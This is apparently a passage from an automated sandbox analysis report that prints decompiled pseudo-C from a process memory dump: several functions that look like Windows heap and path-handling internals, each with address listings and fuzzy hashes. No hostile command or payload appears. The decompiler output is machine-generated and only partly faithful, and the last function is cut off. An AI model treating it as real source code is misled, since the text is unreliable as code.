                                                      0x0171ab51
                                                      0x0171aa44
                                                      0x0171aa47
                                                      0x0171aa4c
                                                      0x00000000
                                                      0x00000000
                                                      0x0171aa5a
                                                      0x0171aa64
                                                      0x0171aa72
                                                      0x00000000
                                                      0x0171aa66
                                                      0x0171aa66
                                                      0x0171aa68
                                                      0x0171aa6a
                                                      0x00000000
                                                      0x0171aa6a

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                      • Instruction ID: 9756a264a1f0d2649aa7071ef62fca8a2b47f4a484f22326869497f123f2162f
                                                      • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                      • Instruction Fuzzy Hash: BE310432F021C96BEB258B6DCD45FBFFBBBEF80210F054469E905A7259DA749D00C650
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01668A0A, Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E01668A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x174d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0169B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0166E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1631180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01681DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01693C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01668999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                      0x01668a0a
                                                      0x01668a1c
                                                      0x01668a23
                                                      0x01668a2e
                                                      0x01668a30
                                                      0x01668a36
                                                      0x01668a3c
                                                      0x01668a3e
                                                      0x01668a4a
                                                      0x01668a52
                                                      0x01668a9c
                                                      0x01668aae
                                                      0x01668a58
                                                      0x01668a5e
                                                      0x01668a6a
                                                      0x01668a6f
                                                      0x01668a75
                                                      0x01668a7d
                                                      0x01668a85
                                                      0x01668a86
                                                      0x01668a89
                                                      0x01668a93
                                                      0x01668a99
                                                      0x01668a9b
                                                      0x00000000
                                                      0x01668aaf
                                                      0x01668abe
                                                      0x01668ac3
                                                      0x01668acb
                                                      0x01668ad7
                                                      0x01668ae0
                                                      0x01668af1
                                                      0x00000000
                                                      0x01668af1
                                                      0x01668acd
                                                      0x01668ad5
                                                      0x01668afb
                                                      0x01668afd
                                                      0x01668aff
                                                      0x01668b07
                                                      0x01668b22
                                                      0x01668b24
                                                      0x01668b2a
                                                      0x01668b2e
                                                      0x01668b3f
                                                      0x01668b78
                                                      0x01668b41
                                                      0x01668b52
                                                      0x01668b54
                                                      0x01668b5c
                                                      0x01668b74
                                                      0x01668b74
                                                      0x01668b5c
                                                      0x01668b3f
                                                      0x01668b5e
                                                      0x01668b61
                                                      0x01668b64
                                                      0x01668b64
                                                      0x01668b6c
                                                      0x01668b6c
                                                      0x01668b11
                                                      0x016b9cd5
                                                      0x016b9cd5
                                                      0x01668b17
                                                      0x01668b1a
                                                      0x01668b1a
                                                      0x00000000
                                                      0x01668ad5
                                                      0x01668a89

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7ebf366915b1f5aca78552448bae6a312c503811f0db01374750cdddef847fe7
                                                      • Instruction ID: 9c8ddd93d3671edb74cdd63d8ecf84c10da5e5ab6d033888b507b2d864c958de
                                                      • Opcode Fuzzy Hash: 7ebf366915b1f5aca78552448bae6a312c503811f0db01374750cdddef847fe7
                                                      • Instruction Fuzzy Hash: 64415FB5A403299BDB24DF69CC88AA9B7BDEB54300F1045EADD1997342E7709E81CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0171FDE2, Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0171FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0171FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01720A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01677D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01711608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01722B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0171C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0171DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01677D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0171A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                      0x0171fde7
                                                      0x0171fde8
                                                      0x0171fdec
                                                      0x0171fdee
                                                      0x0171fdf5
                                                      0x0171fdf7
                                                      0x0171fdfc
                                                      0x0171fe19
                                                      0x0171fe22
                                                      0x0171fe26
                                                      0x0171fec6
                                                      0x0171fecd
                                                      0x0171fed5
                                                      0x0171fee7
                                                      0x0171fed7
                                                      0x0171fee0
                                                      0x0171fee0
                                                      0x0171feef
                                                      0x0171ff00
                                                      0x0171ff02
                                                      0x0171ff07
                                                      0x0171ff07
                                                      0x00000000
                                                      0x0171feef
                                                      0x0171fe33
                                                      0x0171fe55
                                                      0x0171fe59
                                                      0x0171fe5b
                                                      0x0171fe5e
                                                      0x0171fe69
                                                      0x0171fe6d
                                                      0x0171fe6d
                                                      0x0171fe69
                                                      0x0171fe35
                                                      0x0171fe41
                                                      0x0171fe41
                                                      0x0171fe79
                                                      0x0171fe8b
                                                      0x0171fe7b
                                                      0x0171fe84
                                                      0x0171fe84
                                                      0x0171fe93
                                                      0x00000000
                                                      0x0171fea8
                                                      0x0171feba
                                                      0x00000000
                                                      0x0171feba
                                                      0x0171fdfe
                                                      0x0171fe01
                                                      0x0171fe02
                                                      0x0171fe08
                                                      0x0171ff0c
                                                      0x0171ff14
                                                      0x0171ff14

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction ID: 7ce9d6d7f2d3bfcf716354a885600931d0185b5fb084d3b75cf021ead99d4202
                                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction Fuzzy Hash: F7313732300A416FD7229B7CC848F6AFBEAEBC9650F184158E9468B74ADA74DC49C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0171EA55, Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E0171EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01672280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0171E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0165F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0166FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0171AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0171BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01677D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0170FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0166FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0171A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                      0x0171ea55
                                                      0x0171ea66
                                                      0x0171ea68
                                                      0x0171ea6c
                                                      0x0171ea6f
                                                      0x0171ea72
                                                      0x0171ea75
                                                      0x0171ea7a
                                                      0x0171ea7a
                                                      0x0171ea7e
                                                      0x0171ea80
                                                      0x0171ea85
                                                      0x0171ea8b
                                                      0x0171eab5
                                                      0x0171eabc
                                                      0x0171eabf
                                                      0x0171eabf
                                                      0x0171eaca
                                                      0x0171eace
                                                      0x0171ead0
                                                      0x0171eae4
                                                      0x0171eaeb
                                                      0x0171eaf0
                                                      0x0171eaf5
                                                      0x0171eb09
                                                      0x0171eb0d
                                                      0x0171eb1d
                                                      0x0171eb2d
                                                      0x0171eb38
                                                      0x0171eb3d
                                                      0x0171eb41
                                                      0x0171eb4a
                                                      0x0171eb60
                                                      0x0171eb4c
                                                      0x0171eb52
                                                      0x0171eb59
                                                      0x0171eb59
                                                      0x0171eb68
                                                      0x0171eb71
                                                      0x0171eb71
                                                      0x0171ea8d
                                                      0x0171ea8f
                                                      0x0171ea92
                                                      0x0171ea97
                                                      0x0171ea97
                                                      0x0171ea9b
                                                      0x0171ea9c
                                                      0x0171ea9e
                                                      0x0171eaa6
                                                      0x0171eaa6
                                                      0x0171eb7e

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction ID: ae9a5b6d5610fb61f3ce83f189d84f1894ad20224ff4b1bff42a8fade8889c6e
                                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction Fuzzy Hash: 0631A3726047069BC72ADF2CCC84A6BF7AAFBC4210F04492DF95687689DE30E905C7A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D69A6, Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E016D69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x174d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01666C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E016D6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01699980() >= 0) {
							E01672280(_t56, 0x1748778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1748774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1748774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0165B6F0(0x163c338, 0x163c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01699520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E016995D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0166FFB0(_t68, _t77, 0x1748778);
				}
				_pop(_t78);
				return E0169B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                      0x016d69b5
                                                      0x016d69be
                                                      0x016d69c3
                                                      0x016d69c9
                                                      0x016d69cc
                                                      0x016d69d1
                                                      0x016d69d3
                                                      0x016d69de
                                                      0x016d69e1
                                                      0x016d69ea
                                                      0x016d69f6
                                                      0x016d69fe
                                                      0x016d6a13
                                                      0x016d6a14
                                                      0x016d6a15
                                                      0x016d6a16
                                                      0x016d6a1e
                                                      0x016d6a26
                                                      0x016d6a31
                                                      0x016d6a36
                                                      0x016d6a37
                                                      0x016d6a40
                                                      0x016d6a49
                                                      0x016d6a4a
                                                      0x016d6a53
                                                      0x016d6a59
                                                      0x016d6a5d
                                                      0x016d6a5e
                                                      0x016d6a64
                                                      0x016d6a67
                                                      0x016d6a6a
                                                      0x016d6a6d
                                                      0x016d6a70
                                                      0x016d6a77
                                                      0x016d6a7d
                                                      0x016d6a86
                                                      0x016d6a89
                                                      0x016d6a9c
                                                      0x016d6a9f
                                                      0x016d6aa2
                                                      0x016d6aa5
                                                      0x016d6aaf
                                                      0x016d6ab1
                                                      0x016d6ab8
                                                      0x016d6ab9
                                                      0x016d6abb
                                                      0x016d6abe
                                                      0x016d6ac5
                                                      0x016d6ac5
                                                      0x016d6aaf
                                                      0x016d6a40
                                                      0x016d6a26
                                                      0x016d69fe
                                                      0x016d6ace
                                                      0x016d6ad0
                                                      0x016d6ad3
                                                      0x016d6ad8
                                                      0x016d6adf
                                                      0x016d6adf
                                                      0x016d6ae8
                                                      0x016d6aef
                                                      0x016d6aef
                                                      0x016d6af9
                                                      0x016d6b06

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4dd1041abef3c28e712ce291c31167c7e3cac545d044ead03d7e3adc30a56553
                                                      • Instruction ID: 10452693d2196508ff6728f210efeae034b43c02d9140987655ae5417ba250bc
                                                      • Opcode Fuzzy Hash: 4dd1041abef3c28e712ce291c31167c7e3cac545d044ead03d7e3adc30a56553
                                                      • Instruction Fuzzy Hash: 1C417BB1D00209AFDB24CFA9D940BAEBBF9EF48714F08812EE955A3240DB70A905CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01655210, Relevance: .1, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E01655210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E016552A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016995D0();
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0166EB70(_t54, 0x17479a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E016995D0();
								L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0166EB70(_t54, 0x17479a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0169F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0166EB70(_t54, 0x17479a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016995D0();
							L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                      0x01655220
                                                      0x01655224
                                                      0x016b0d13
                                                      0x016b0d16
                                                      0x016b0d19
                                                      0x0165522a
                                                      0x0165522a
                                                      0x0165522d
                                                      0x0165522d
                                                      0x01655231
                                                      0x01655235
                                                      0x01655239
                                                      0x016b0d5c
                                                      0x016b0d62
                                                      0x00000000
                                                      0x00000000
                                                      0x016b0d6a
                                                      0x016b0d7b
                                                      0x016b0d7f
                                                      0x016b0d81
                                                      0x016b0d84
                                                      0x016b0d95
                                                      0x016b0d95
                                                      0x016b0d6c
                                                      0x016b0d71
                                                      0x016b0d71
                                                      0x016b0d9a
                                                      0x00000000
                                                      0x0165524a
                                                      0x0165524a
                                                      0x01655250
                                                      0x016b0d24
                                                      0x016b0d35
                                                      0x016b0d39
                                                      0x016b0d3b
                                                      0x016b0d3e
                                                      0x016b0d50
                                                      0x016b0d50
                                                      0x016b0d26
                                                      0x016b0d2b
                                                      0x016b0d2b
                                                      0x00000000
                                                      0x016b0d55
                                                      0x01655256
                                                      0x0165525b
                                                      0x01655265
                                                      0x016b0da7
                                                      0x0165526b
                                                      0x0165526e
                                                      0x01655272
                                                      0x016b0db1
                                                      0x016b0db4
                                                      0x016b0dc5
                                                      0x016b0dc5
                                                      0x01655272
                                                      0x01655278
                                                      0x0165527e
                                                      0x0165528a
                                                      0x0165528c
                                                      0x0165528d
                                                      0x00000000
                                                      0x01655280
                                                      0x01655282
                                                      0x01655288
                                                      0x0165529f
                                                      0x01655292
                                                      0x00000000
                                                      0x01655292
                                                      0x00000000
                                                      0x01655288
                                                      0x0165527e

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 648097fe6de5598045241ad17f84fcae07bc33ffde1938d395d1f6550be76e8e
                                                      • Instruction ID: 6f2acd47881d52c96dd2faedbc81f8a4cb1c9ef731b9499e04a5cd3b57d43c63
                                                      • Opcode Fuzzy Hash: 648097fe6de5598045241ad17f84fcae07bc33ffde1938d395d1f6550be76e8e
                                                      • Instruction Fuzzy Hash: D2311832241601EBC7269B18CC84B7B7B76FF10760F11861DF9564B6D0E760F841C794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01693D43, Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01693D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01667B60(0, _t61, 0x16311c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01667B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01674620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                      0x01693d4c
                                                      0x01693d50
                                                      0x01693d55
                                                      0x01693d5e
                                                      0x016ce79a
                                                      0x00000000
                                                      0x016ce79a
                                                      0x01693d68
                                                      0x016ce789
                                                      0x01693d9d
                                                      0x01693da3
                                                      0x01693daf
                                                      0x01693db5
                                                      0x01693dbc
                                                      0x01693dc4
                                                      0x01693dc9
                                                      0x01693dce
                                                      0x016ce7ae
                                                      0x016ce7ae
                                                      0x01693dde
                                                      0x01693de2
                                                      0x01693de7
                                                      0x01693e0d
                                                      0x01693e13
                                                      0x01693e16
                                                      0x01693e1e
                                                      0x01693e25
                                                      0x01693e28
                                                      0x00000000
                                                      0x00000000
                                                      0x01693e2a
                                                      0x01693e2f
                                                      0x01693e37
                                                      0x01693e37
                                                      0x00000000
                                                      0x01693e37
                                                      0x01693e31
                                                      0x00000000
                                                      0x01693e31
                                                      0x01693e20
                                                      0x01693e20
                                                      0x01693e35
                                                      0x00000000
                                                      0x01693de9
                                                      0x01693de9
                                                      0x01693de9
                                                      0x01693dee
                                                      0x01693dfd
                                                      0x01693dff
                                                      0x01693e02
                                                      0x01693e05
                                                      0x01693e05
                                                      0x00000000
                                                      0x01693df0
                                                      0x01693de7
                                                      0x016ce78f
                                                      0x016ce794
                                                      0x01693d79
                                                      0x01693d84
                                                      0x01693d89
                                                      0x01693d8e
                                                      0x00000000
                                                      0x016ce7a4
                                                      0x01693d96
                                                      0x01693d9a
                                                      0x00000000
                                                      0x01693d9a
                                                      0x00000000
                                                      0x016ce794
                                                      0x01693d6e
                                                      0x01693d73
                                                      0x00000000
                                                      0x016ce7b5
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 37fe8488daaecdfceadc426637d45162c76e8d9e6b0dfd97667bee703ec3ebd3
                                                      • Instruction ID: f404bdfef8f594c1fabee40004ec409e18b3653b73c580f4f90eb474dba6de91
                                                      • Opcode Fuzzy Hash: 37fe8488daaecdfceadc426637d45162c76e8d9e6b0dfd97667bee703ec3ebd3
                                                      • Instruction Fuzzy Hash: E4317C32A05615DBDB258F3ECC51A7ABBB9FF45B10B05806EE94ACB360E730D841D7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0168A61C, Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E0168A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1730220);
				E016AD08C(__ebx, __edi, __esi);
